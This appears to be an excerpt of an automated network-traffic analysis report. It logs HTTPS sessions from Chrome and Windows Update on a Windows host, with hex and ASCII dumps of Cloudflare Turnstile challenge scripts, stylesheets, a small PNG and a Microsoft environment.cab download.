                                                                                                                          Data Ascii: ay:flex;flex-flow:column nowrap;gap:0;height:140px;padding:12px 0;place-content:space-between}.size-compact .link-spacer{margin-left:3px;margin-right:3px}.size-compact .cb-c{margin:0 12px;text-align:left}.size-compact .cb-container{margin:0 12px}.size-com
                                                                                                                          2024-11-25 15:42:33 UTC1369INData Raw: 69 7b 6c 65 66 74 3a 32 35 35 70 78 7d 2e 72 74 6c 20 23 66 72 2d 68 65 6c 70 65 72 2c 2e 72 74 6c 20 23 66 72 2d 6f 76 65 72 72 75 6e 7b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2e 32 35 65 6d 3b 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 30 7d 2e 72 74 6c 20 23 62 72 61 6e 64 69 6e 67 7b 6d 61 72 67 69 6e 3a 30 20 30 20 30 20 31 36 70 78 3b 77 69 64 74 68 3a 39 30 70 78 7d 2e 72 74 6c 20 23 62 72 61 6e 64 69 6e 67 2c 2e 72 74 6c 2e 73 69 7a 65 2d 63 6f 6d 70 61 63 74 20 23 62 72 61 6e 64 69 6e 67 7b 70 61 64 64 69 6e 67 2d 6c 65 66 74 3a 30 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 6c 65 66 74 7d 2e 72 74 6c 2e 73 69 7a 65 2d 63 6f 6d 70 61 63 74 20 23 62 72 61 6e 64 69 6e 67 7b 61 6c 69 67 6e 2d 73 65 6c 66 3a 66 6c 65
                                                                                                                          Data Ascii: i{left:255px}.rtl #fr-helper,.rtl #fr-overrun{margin-left:.25em;margin-right:0}.rtl #branding{margin:0 0 0 16px;width:90px}.rtl #branding,.rtl.size-compact #branding{padding-left:0;padding-right:0;text-align:left}.rtl.size-compact #branding{align-self:fle
                                                                                                                          2024-11-25 15:42:33 UTC1369INData Raw: 6f 6c 6f 72 3a 23 31 36 36 33 37 39 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 75 6e 64 65 72 6c 69 6e 65 7d 23 63 68 61 6c 6c 65 6e 67 65 2d 65 72 72 6f 72 2d 74 69 74 6c 65 20 61 3a 6c 69 6e 6b 2c 23 63 68 61 6c 6c 65 6e 67 65 2d 65 72 72 6f 72 2d 74 69 74 6c 65 20 61 3a 76 69 73 69 74 65 64 7b 63 6f 6c 6f 72 3a 23 32 33 32 33 32 33 7d 23 63 68 61 6c 6c 65 6e 67 65 2d 65 72 72 6f 72 2d 74 69 74 6c 65 20 2e 69 2d 77 72 61 70 70 65 72 7b 64 69 73 70 6c 61 79 3a 6e 6f 6e 65 7d 2e 75 6e 73 70 75 6e 20 2e 63 69 72 63 6c 65 7b 61 6e 69 6d 61 74 69 6f 6e 3a 75 6e 73 70 69 6e 20 2e 37 73 20 63 75 62 69 63 2d 62 65 7a 69 65 72 28 2e 36 35 2c 30 2c 2e 34 35 2c 31 29 20 66 6f 72 77 61 72 64 73 7d 2e 63 69 72 63 6c 65 7b 73 74 72 6f 6b 65 2d 77 69 64 74 68
                                                                                                                          Data Ascii: olor:#166379;text-decoration:underline}#challenge-error-title a:link,#challenge-error-title a:visited{color:#232323}#challenge-error-title .i-wrapper{display:none}.unspun .circle{animation:unspin .7s cubic-bezier(.65,0,.45,1) forwards}.circle{stroke-width


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                          11192.168.2.449754104.18.94.414434944C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          2024-11-25 15:42:34 UTC730OUTGET /cdn-cgi/challenge-platform/h/g/orchestrate/chl_api/v1?ray=8e82bfcf1ab94363&lang=auto HTTP/1.1
                                                                                                                          Host: challenges.cloudflare.com
                                                                                                                          Connection: keep-alive
                                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                          Accept: */*
                                                                                                                          Sec-Fetch-Site: same-origin
                                                                                                                          Sec-Fetch-Mode: no-cors
                                                                                                                          Sec-Fetch-Dest: script
                                                                                                                          Referer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/turnstile/if/ov2/av0/rcv0/0/qgqz3/0x4AAAAAAAz5HcczQ_Y58zGl/auto/fbE/normal/auto/
                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                          2024-11-25 15:42:34 UTC331INHTTP/1.1 200 OK
                                                                                                                          Date: Mon, 25 Nov 2024 15:42:34 GMT
                                                                                                                          Content-Type: application/javascript; charset=UTF-8
                                                                                                                          Content-Length: 116722
                                                                                                                          Connection: close
                                                                                                                          cache-control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                                                                          Server: cloudflare
                                                                                                                          CF-RAY: 8e82bfda5d6042cd-EWR
                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                          2024-11-25 15:42:34 UTC1038INData Raw: 77 69 6e 64 6f 77 2e 5f 63 66 5f 63 68 6c 5f 6f 70 74 2e 75 61 4f 3d 66 61 6c 73 65 3b 77 69 6e 64 6f 77 2e 5f 63 66 5f 63 68 6c 5f 6f 70 74 2e 75 50 69 6b 62 33 3d 7b 22 6d 65 74 61 64 61 74 61 22 3a 7b 22 63 68 61 6c 6c 65 6e 67 65 2e 74 65 72 6d 73 22 3a 22 68 74 74 70 73 25 33 41 25 32 46 25 32 46 77 77 77 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 25 32 46 77 65 62 73 69 74 65 2d 74 65 72 6d 73 25 32 46 22 2c 22 63 68 61 6c 6c 65 6e 67 65 2e 70 72 69 76 61 63 79 5f 6c 69 6e 6b 22 3a 22 68 74 74 70 73 25 33 41 25 32 46 25 32 46 77 77 77 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 25 32 46 70 72 69 76 61 63 79 70 6f 6c 69 63 79 25 32 46 22 2c 22 63 68 61 6c 6c 65 6e 67 65 2e 73 75 70 70 6f 72 74 65 64 5f 62 72 6f 77 73 65 72 73 22 3a 22 68 74 74 70
                                                                                                                          Data Ascii: window._cf_chl_opt.uaO=false;window._cf_chl_opt.uPikb3={"metadata":{"challenge.terms":"https%3A%2F%2Fwww.cloudflare.com%2Fwebsite-terms%2F","challenge.privacy_link":"https%3A%2F%2Fwww.cloudflare.com%2Fprivacypolicy%2F","challenge.supported_browsers":"http
                                                                                                                          2024-11-25 15:42:34 UTC1369INData Raw: 69 74 79 25 32 30 63 68 61 6c 6c 65 6e 67 65 22 2c 22 74 69 6d 65 5f 63 68 65 63 6b 5f 63 61 63 68 65 64 5f 77 61 72 6e 69 6e 67 22 3a 22 59 6f 75 72 25 32 30 64 65 76 69 63 65 25 32 30 63 6c 6f 63 6b 25 32 30 69 73 25 32 30 73 65 74 25 32 30 74 6f 25 32 30 61 25 32 30 77 72 6f 6e 67 25 32 30 74 69 6d 65 25 32 30 6f 72 25 32 30 74 68 69 73 25 32 30 63 68 61 6c 6c 65 6e 67 65 25 32 30 70 61 67 65 25 32 30 77 61 73 25 32 30 61 63 63 69 64 65 6e 74 61 6c 6c 79 25 32 30 63 61 63 68 65 64 25 32 30 62 79 25 32 30 61 6e 25 32 30 69 6e 74 65 72 6d 65 64 69 61 72 79 25 32 30 61 6e 64 25 32 30 69 73 25 32 30 6e 6f 25 32 30 6c 6f 6e 67 65 72 25 32 30 61 76 61 69 6c 61 62 6c 65 22 2c 22 74 65 73 74 69 6e 67 5f 6f 6e 6c 79 22 3a 22 54 65 73 74 69 6e 67 25 32 30 6f 6e
                                                                                                                          Data Ascii: ity%20challenge","time_check_cached_warning":"Your%20device%20clock%20is%20set%20to%20a%20wrong%20time%20or%20this%20challenge%20page%20was%20accidentally%20cached%20by%20an%20intermediary%20and%20is%20no%20longer%20available","testing_only":"Testing%20on
                                                                                                                          2024-11-25 15:42:34 UTC1369INData Raw: 2c 66 59 2c 67 61 2c 67 67 2c 67 68 2c 67 69 2c 67 73 2c 67 44 2c 67 48 2c 65 52 2c 65 53 29 7b 66 6f 72 28 67 4a 3d 62 2c 66 75 6e 63 74 69 6f 6e 28 63 2c 64 2c 67 49 2c 65 2c 66 29 7b 66 6f 72 28 67 49 3d 62 2c 65 3d 63 28 29 3b 21 21 5b 5d 3b 29 74 72 79 7b 69 66 28 66 3d 2d 70 61 72 73 65 49 6e 74 28 67 49 28 31 38 32 30 29 29 2f 31 2a 28 2d 70 61 72 73 65 49 6e 74 28 67 49 28 31 32 35 33 29 29 2f 32 29 2b 70 61 72 73 65 49 6e 74 28 67 49 28 31 36 37 30 29 29 2f 33 2a 28 2d 70 61 72 73 65 49 6e 74 28 67 49 28 31 33 38 34 29 29 2f 34 29 2b 2d 70 61 72 73 65 49 6e 74 28 67 49 28 35 39 38 29 29 2f 35 2a 28 2d 70 61 72 73 65 49 6e 74 28 67 49 28 36 36 32 29 29 2f 36 29 2b 2d 70 61 72 73 65 49 6e 74 28 67 49 28 31 33 32 34 29 29 2f 37 2a 28 2d 70 61 72 73
                                                                                                                          Data Ascii: ,fY,ga,gg,gh,gi,gs,gD,gH,eR,eS){for(gJ=b,function(c,d,gI,e,f){for(gI=b,e=c();!![];)try{if(f=-parseInt(gI(1820))/1*(-parseInt(gI(1253))/2)+parseInt(gI(1670))/3*(-parseInt(gI(1384))/4)+-parseInt(gI(598))/5*(-parseInt(gI(662))/6)+-parseInt(gI(1324))/7*(-pars
                                                                                                                          2024-11-25 15:42:34 UTC1369INData Raw: 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 69 3d 3d 68 7d 2c 27 42 6c 6a 62 63 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 68 26 69 7d 2c 27 45 77 6a 7a 4c 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 68 28 69 29 7d 2c 27 48 42 70 4d 66 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 68 3e 69 7d 2c 27 77 76 69 77 55 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 69 21 3d 68 7d 2c 27 62 4d 66 43 6b 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 69 26 68 7d 2c 27 64 45 45 4b 7a 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 68 2a 69 7d 2c 27 54 53 6b 6d 51 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72
                                                                                                                          Data Ascii: unction(h,i){return i==h},'Bljbc':function(h,i){return h&i},'EwjzL':function(h,i){return h(i)},'HBpMf':function(h,i){return h>i},'wviwU':function(h,i){return i!=h},'bMfCk':function(h,i){return i&h},'dEEKz':function(h,i){return h*i},'TSkmQ':function(h,i){r
                                                                                                                          2024-11-25 15:42:34 UTC1369INData Raw: 68 76 28 31 37 33 36 29 5d 28 32 35 36 2c 43 5b 68 76 28 35 36 37 29 5d 28 30 29 29 29 7b 66 6f 72 28 73 3d 30 3b 64 5b 68 76 28 31 31 34 36 29 5d 28 73 2c 46 29 3b 48 3c 3c 3d 31 2c 49 3d 3d 6a 2d 31 3f 28 49 3d 30 2c 47 5b 68 76 28 31 37 35 34 29 5d 28 6f 28 48 29 29 2c 48 3d 30 29 3a 49 2b 2b 2c 73 2b 2b 29 3b 66 6f 72 28 4d 3d 43 5b 68 76 28 35 36 37 29 5d 28 30 29 2c 73 3d 30 3b 38 3e 73 3b 48 3d 64 5b 68 76 28 31 32 33 34 29 5d 28 48 3c 3c 31 2e 37 33 2c 31 2e 39 34 26 4d 29 2c 64 5b 68 76 28 36 33 34 29 5d 28 49 2c 64 5b 68 76 28 31 31 35 34 29 5d 28 6a 2c 31 29 29 3f 28 49 3d 30 2c 47 5b 68 76 28 31 37 35 34 29 5d 28 6f 28 48 29 29 2c 48 3d 30 29 3a 49 2b 2b 2c 4d 3e 3e 3d 31 2c 73 2b 2b 29 3b 7d 65 6c 73 65 7b 66 6f 72 28 4d 3d 31 2c 73 3d 30 3b
                                                                                                                          Data Ascii: hv(1736)](256,C[hv(567)](0))){for(s=0;d[hv(1146)](s,F);H<<=1,I==j-1?(I=0,G[hv(1754)](o(H)),H=0):I++,s++);for(M=C[hv(567)](0),s=0;8>s;H=d[hv(1234)](H<<1.73,1.94&M),d[hv(634)](I,d[hv(1154)](j,1))?(I=0,G[hv(1754)](o(H)),H=0):I++,M>>=1,s++);}else{for(M=1,s=0;
                                                                                                                          2024-11-25 15:42:34 UTC1369INData Raw: 47 5b 68 76 28 31 37 35 34 29 5d 28 6f 28 48 29 29 2c 48 3d 30 29 3a 49 2b 2b 2c 4d 3e 3e 3d 31 2c 73 2b 2b 29 3b 44 2d 2d 2c 64 5b 68 76 28 31 38 31 34 29 5d 28 30 2c 44 29 26 26 46 2b 2b 7d 66 6f 72 28 4d 3d 32 2c 73 3d 30 3b 73 3c 46 3b 48 3d 64 5b 68 76 28 31 32 33 34 29 5d 28 64 5b 68 76 28 31 37 34 39 29 5d 28 48 2c 31 29 2c 64 5b 68 76 28 31 36 39 39 29 5d 28 4d 2c 31 29 29 2c 6a 2d 31 3d 3d 49 3f 28 49 3d 30 2c 47 5b 68 76 28 31 37 35 34 29 5d 28 6f 28 48 29 29 2c 48 3d 30 29 3a 49 2b 2b 2c 4d 3e 3e 3d 31 2c 73 2b 2b 29 3b 66 6f 72 28 3b 3b 29 69 66 28 48 3c 3c 3d 31 2c 49 3d 3d 6a 2d 31 29 7b 47 5b 68 76 28 31 37 35 34 29 5d 28 64 5b 68 76 28 31 30 31 37 29 5d 28 6f 2c 48 29 29 3b 62 72 65 61 6b 7d 65 6c 73 65 20 49 2b 2b 3b 72 65 74 75 72 6e 20
                                                                                                                          Data Ascii: G[hv(1754)](o(H)),H=0):I++,M>>=1,s++);D--,d[hv(1814)](0,D)&&F++}for(M=2,s=0;s<F;H=d[hv(1234)](d[hv(1749)](H,1),d[hv(1699)](M,1)),j-1==I?(I=0,G[hv(1754)](o(H)),H=0):I++,M>>=1,s++);for(;;)if(H<<=1,I==j-1){G[hv(1754)](d[hv(1017)](o,H));break}else I++;return
                                                                                                                          2024-11-25 15:42:34 UTC1369INData Raw: 4a 3d 73 28 4c 2b 2b 29 29 2c 4d 7c 3d 49 2a 28 30 3c 4f 3f 31 3a 30 29 2c 49 3c 3c 3d 31 29 3b 43 5b 45 2b 2b 5d 3d 65 28 4d 29 2c 50 3d 45 2d 31 2c 44 2d 2d 3b 62 72 65 61 6b 3b 63 61 73 65 20 31 3a 66 6f 72 28 4d 3d 30 2c 4e 3d 4d 61 74 68 5b 68 79 28 31 34 30 35 29 5d 28 32 2c 31 36 29 2c 49 3d 31 3b 4e 21 3d 49 3b 4f 3d 4a 26 4b 2c 4b 3e 3e 3d 31 2c 64 5b 68 79 28 36 33 34 29 5d 28 30 2c 4b 29 26 26 28 4b 3d 6f 2c 4a 3d 64 5b 68 79 28 39 30 33 29 5d 28 73 2c 4c 2b 2b 29 29 2c 4d 7c 3d 64 5b 68 79 28 37 38 31 29 5d 28 30 3c 4f 3f 31 3a 30 2c 49 29 2c 49 3c 3c 3d 31 29 3b 43 5b 45 2b 2b 5d 3d 64 5b 68 79 28 31 34 31 34 29 5d 28 65 2c 4d 29 2c 50 3d 45 2d 31 2c 44 2d 2d 3b 62 72 65 61 6b 3b 63 61 73 65 20 32 3a 72 65 74 75 72 6e 20 47 5b 68 79 28 31 35
                                                                                                                          Data Ascii: J=s(L++)),M|=I*(0<O?1:0),I<<=1);C[E++]=e(M),P=E-1,D--;break;case 1:for(M=0,N=Math[hy(1405)](2,16),I=1;N!=I;O=J&K,K>>=1,d[hy(634)](0,K)&&(K=o,J=d[hy(903)](s,L++)),M|=d[hy(781)](0<O?1:0,I),I<<=1);C[E++]=d[hy(1414)](e,M),P=E-1,D--;break;case 2:return G[hy(15
                                                                                                                          2024-11-25 15:42:34 UTC1369INData Raw: 6f 6e 28 47 2c 48 29 7b 72 65 74 75 72 6e 20 47 2b 48 7d 2c 27 52 48 54 76 6f 27 3a 66 75 6e 63 74 69 6f 6e 28 47 2c 48 29 7b 72 65 74 75 72 6e 20 47 3d 3d 3d 48 7d 2c 27 54 6a 66 56 74 27 3a 66 75 6e 63 74 69 6f 6e 28 47 2c 48 29 7b 72 65 74 75 72 6e 20 47 28 48 29 7d 2c 27 57 73 77 64 6d 27 3a 66 75 6e 63 74 69 6f 6e 28 47 2c 48 29 7b 72 65 74 75 72 6e 20 47 28 48 29 7d 2c 27 74 42 53 43 51 27 3a 66 75 6e 63 74 69 6f 6e 28 47 2c 48 29 7b 72 65 74 75 72 6e 20 48 3d 3d 3d 47 7d 2c 27 67 72 56 65 56 27 3a 66 75 6e 63 74 69 6f 6e 28 47 2c 48 2c 49 29 7b 72 65 74 75 72 6e 20 47 28 48 2c 49 29 7d 7d 2c 6f 5b 69 62 28 31 35 32 32 29 5d 28 6e 75 6c 6c 2c 68 29 7c 7c 68 3d 3d 3d 76 6f 69 64 20 30 29 72 65 74 75 72 6e 20 6a 3b 66 6f 72 28 78 3d 6f 5b 69 62 28 39
                                                                                                                          Data Ascii: on(G,H){return G+H},'RHTvo':function(G,H){return G===H},'TjfVt':function(G,H){return G(H)},'Wswdm':function(G,H){return G(H)},'tBSCQ':function(G,H){return H===G},'grVeV':function(G,H,I){return G(H,I)}},o[ib(1522)](null,h)||h===void 0)return j;for(x=o[ib(9
                                                                                                                          2024-11-25 15:42:34 UTC1369INData Raw: 29 7b 72 65 74 75 72 6e 27 6f 2e 27 2b 6e 7d 29 7d 2c 65 4d 5b 67 4a 28 31 37 39 32 29 5d 3d 66 75 6e 63 74 69 6f 6e 28 69 65 2c 63 2c 64 2c 65 29 7b 69 65 3d 67 4a 2c 63 3d 7b 27 79 74 6b 69 47 27 3a 66 75 6e 63 74 69 6f 6e 28 66 29 7b 72 65 74 75 72 6e 20 66 28 29 7d 2c 27 48 4f 76 49 65 27 3a 69 65 28 38 36 34 29 2c 27 49 4e 54 4c 75 27 3a 69 65 28 39 32 30 29 2c 27 76 58 45 4d 65 27 3a 69 65 28 31 33 39 38 29 2c 27 73 6f 76 6d 78 27 3a 69 65 28 34 31 36 29 2c 27 6a 43 58 69 70 27 3a 66 75 6e 63 74 69 6f 6e 28 66 2c 67 29 7b 72 65 74 75 72 6e 20 66 2a 67 7d 2c 27 57 43 69 71 4c 27 3a 66 75 6e 63 74 69 6f 6e 28 66 2c 67 29 7b 72 65 74 75 72 6e 20 66 3c 3c 67 7d 7d 2c 64 3d 31 2c 65 3d 63 5b 69 65 28 31 30 37 32 29 5d 28 31 65 33 2c 65 4d 5b 69 65 28 37
                                                                                                                          Data Ascii: ){return'o.'+n})},eM[gJ(1792)]=function(ie,c,d,e){ie=gJ,c={'ytkiG':function(f){return f()},'HOvIe':ie(864),'INTLu':ie(920),'vXEMe':ie(1398),'sovmx':ie(416),'jCXip':function(f,g){return f*g},'WCiqL':function(f,g){return f<<g}},d=1,e=c[ie(1072)](1e3,eM[ie(7
                                                                                                                          2024-11-25 15:42:34 UTC1369INData Raw: 37 34 29 5d 29 2c 31 29 2b 69 68 28 36 35 35 29 2b 65 4d 5b 69 68 28 31 34 39 38 29 5d 5b 69 68 28 37 37 35 29 5d 2b 27 2f 27 2b 65 4d 5b 69 68 28 31 34 39 38 29 5d 2e 63 48 2c 27 2f 27 29 2c 65 4d 5b 69 68 28 31 34 39 38 29 5d 5b 69 68 28 31 32 36 39 29 5d 29 2c 6e 3d 7b 7d 2c 6e 5b 69 68 28 31 32 35 34 29 5d 3d 65 4d 5b 69 68 28 31 34 39 38 29 5d 5b 69 68 28 31 32 35 34 29 5d 2c 6e 5b 69 68 28 33 38 35 29 5d 3d 65 4d 5b 69 68 28 31 34 39 38 29 5d 5b 69 68 28 33 38 35 29 5d 2c 6e 5b 69 68 28 31 34 30 37 29 5d 3d 65 4d 5b 69 68 28 31 34 39 38 29 5d 5b 69 68 28 31 34 30 37 29 5d 2c 6e 5b 69 68 28 34 31 30 29 5d 3d 65 4d 5b 69 68 28 31 34 39 38 29 5d 5b 69 68 28 31 34 34 39 29 5d 2c 6f 3d 6e 2c 73 3d 6e 65 77 20 65 4d 5b 28 69 68 28 31 34 38 35 29 29 5d 28
                                                                                                                          Data Ascii: 74)]),1)+ih(655)+eM[ih(1498)][ih(775)]+'/'+eM[ih(1498)].cH,'/'),eM[ih(1498)][ih(1269)]),n={},n[ih(1254)]=eM[ih(1498)][ih(1254)],n[ih(385)]=eM[ih(1498)][ih(385)],n[ih(1407)]=eM[ih(1498)][ih(1407)],n[ih(410)]=eM[ih(1498)][ih(1449)],o=n,s=new eM[(ih(1485))](


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                          12192.168.2.449755104.18.94.414434944C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          2024-11-25 15:42:34 UTC742OUTGET /cdn-cgi/challenge-platform/h/g/cmg/1 HTTP/1.1
                                                                                                                          Host: challenges.cloudflare.com
                                                                                                                          Connection: keep-alive
                                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                          Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                          Sec-Fetch-Site: same-origin
                                                                                                                          Sec-Fetch-Mode: no-cors
                                                                                                                          Sec-Fetch-Dest: image
                                                                                                                          Referer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/turnstile/if/ov2/av0/rcv0/0/qgqz3/0x4AAAAAAAz5HcczQ_Y58zGl/auto/fbE/normal/auto/
                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                          2024-11-25 15:42:34 UTC240INHTTP/1.1 200 OK
                                                                                                                          Date: Mon, 25 Nov 2024 15:42:34 GMT
                                                                                                                          Content-Type: image/png
                                                                                                                          Content-Length: 61
                                                                                                                          Connection: close
                                                                                                                          cache-control: max-age=2629800, public
                                                                                                                          Server: cloudflare
                                                                                                                          CF-RAY: 8e82bfdb8bc542e9-EWR
                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                          2024-11-25 15:42:34 UTC61INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 02 00 00 00 02 08 02 00 00 00 fd d4 9a 73 00 00 00 04 49 44 41 54 00 00 00 01 9d 24 d7 91 00 00 00 00 49 45 4e 44 ae 42 60 82
                                                                                                                          Data Ascii: PNGIHDRsIDAT$IENDB`


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                          13192.168.2.44975320.109.210.53443
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          2024-11-25 15:42:34 UTC306OUTGET /SLS/%7B522D76A4-93E1-47F8-B8CE-07C937AD1A1E%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=1YtuxKSP5EdRDh+&MD=YkXyWXgC HTTP/1.1
                                                                                                                          Connection: Keep-Alive
                                                                                                                          Accept: */*
                                                                                                                          User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33
                                                                                                                          Host: slscr.update.microsoft.com
                                                                                                                          2024-11-25 15:42:35 UTC560INHTTP/1.1 200 OK
                                                                                                                          Cache-Control: no-cache
                                                                                                                          Pragma: no-cache
                                                                                                                          Content-Type: application/octet-stream
                                                                                                                          Expires: -1
                                                                                                                          Last-Modified: Mon, 01 Jan 0001 00:00:00 GMT
                                                                                                                          ETag: "XAopazV00XDWnJCwkmEWRv6JkbjRA9QSSZ2+e/3MzEk=_2880"
                                                                                                                          MS-CorrelationId: 7fe6e68d-4612-4b0d-8ab5-4a45cdadfd0b
                                                                                                                          MS-RequestId: 073583d9-95ed-4463-9aaf-9d8a6f9a2639
                                                                                                                          MS-CV: pdF4hRu/LEmCvmuh.0
                                                                                                                          X-Microsoft-SLSClientCache: 2880
                                                                                                                          Content-Disposition: attachment; filename=environment.cab
                                                                                                                          X-Content-Type-Options: nosniff
                                                                                                                          Date: Mon, 25 Nov 2024 15:42:34 GMT
                                                                                                                          Connection: close
                                                                                                                          Content-Length: 24490
                                                                                                                          2024-11-25 15:42:35 UTC15824INData Raw: 4d 53 43 46 00 00 00 00 92 1e 00 00 00 00 00 00 44 00 00 00 00 00 00 00 03 01 01 00 01 00 04 00 23 d0 00 00 14 00 00 00 00 00 10 00 92 1e 00 00 18 41 00 00 00 00 00 00 00 00 00 00 64 00 00 00 01 00 01 00 e6 42 00 00 00 00 00 00 00 00 00 00 00 00 80 00 65 6e 76 69 72 6f 6e 6d 65 6e 74 2e 63 61 62 00 78 cf 8d 5c 26 1e e6 42 43 4b ed 5c 07 54 13 db d6 4e a3 f7 2e d5 d0 3b 4c 42 af 4a 57 10 e9 20 bd 77 21 94 80 88 08 24 2a 02 02 d2 55 10 a4 a8 88 97 22 8a 0a d2 11 04 95 ae d2 8b 20 28 0a 88 20 45 05 f4 9f 80 05 bd ed dd f7 ff 77 dd f7 bf 65 d6 4a 66 ce 99 33 67 4e d9 7b 7f fb db 7b 56 f4 4d 34 b4 21 e0 a7 03 0a d9 fc 68 6e 1d 20 70 28 14 02 85 20 20 ad 61 10 08 e3 66 0d ed 66 9b 1d 6a 90 af 1f 17 f0 4b 68 35 01 83 6c fb 44 42 5c 7d 83 3d 03 30 be 3e ae be 58
                                                                                                                          Data Ascii: MSCFD#AdBenvironment.cabx\&BCK\TN.;LBJW w!$*U" ( EweJf3gN{{VM4!hn p( affjKh5lDB\}=0>X
                                                                                                                          2024-11-25 15:42:35 UTC8666INData Raw: 04 01 31 2f 30 2d 30 0a 02 05 00 e1 2b 8a 50 02 01 00 30 0a 02 01 00 02 02 12 fe 02 01 ff 30 07 02 01 00 02 02 11 e6 30 0a 02 05 00 e1 2c db d0 02 01 00 30 36 06 0a 2b 06 01 04 01 84 59 0a 04 02 31 28 30 26 30 0c 06 0a 2b 06 01 04 01 84 59 0a 03 02 a0 0a 30 08 02 01 00 02 03 07 a1 20 a1 0a 30 08 02 01 00 02 03 01 86 a0 30 0d 06 09 2a 86 48 86 f7 0d 01 01 05 05 00 03 81 81 00 0c d9 08 df 48 94 57 65 3e ad e7 f2 17 9c 1f ca 3d 4d 6c cd 51 e1 ed 9c 17 a5 52 35 0f fd de 4b bd 22 92 c5 69 e5 d7 9f 29 23 72 40 7a ca 55 9d 8d 11 ad d5 54 00 bb 53 b4 87 7b 72 84 da 2d f6 e3 2c 4f 7e ba 1a 58 88 6e d6 b9 6d 16 ae 85 5b b5 c2 81 a8 e0 ee 0a 9c 60 51 3a 7b e4 61 f8 c3 e4 38 bd 7d 28 17 d6 79 f0 c8 58 c6 ef 1f f7 88 65 b1 ea 0a c0 df f7 ee 5c 23 c2 27 fd 98 63 08 31
                                                                                                                          Data Ascii: 1/0-0+P000,06+Y1(0&0+Y0 00*HHWe>=MlQR5K"i)#r@zUTS{r-,O~Xnm[`Q:{a8}(yXe\#'c1


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                          14192.168.2.449758104.18.95.414434944C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          2024-11-25 15:42:36 UTC385OUTGET /cdn-cgi/challenge-platform/h/g/cmg/1 HTTP/1.1
                                                                                                                          Host: challenges.cloudflare.com
                                                                                                                          Connection: keep-alive
                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                          Accept: */*
                                                                                                                          Sec-Fetch-Site: none
                                                                                                                          Sec-Fetch-Mode: cors
                                                                                                                          Sec-Fetch-Dest: empty
                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                          2024-11-25 15:42:36 UTC240INHTTP/1.1 200 OK
                                                                                                                          Date: Mon, 25 Nov 2024 15:42:36 GMT
                                                                                                                          Content-Type: image/png
                                                                                                                          Content-Length: 61
                                                                                                                          Connection: close
                                                                                                                          cache-control: max-age=2629800, public
                                                                                                                          Server: cloudflare
                                                                                                                          CF-RAY: 8e82bfe628a27d11-EWR
                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                          2024-11-25 15:42:36 UTC61INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 02 00 00 00 02 08 02 00 00 00 fd d4 9a 73 00 00 00 04 49 44 41 54 00 00 00 01 9d 24 d7 91 00 00 00 00 49 45 4e 44 ae 42 60 82
                                                                                                                          Data Ascii: PNGIHDRsIDAT$IENDB`


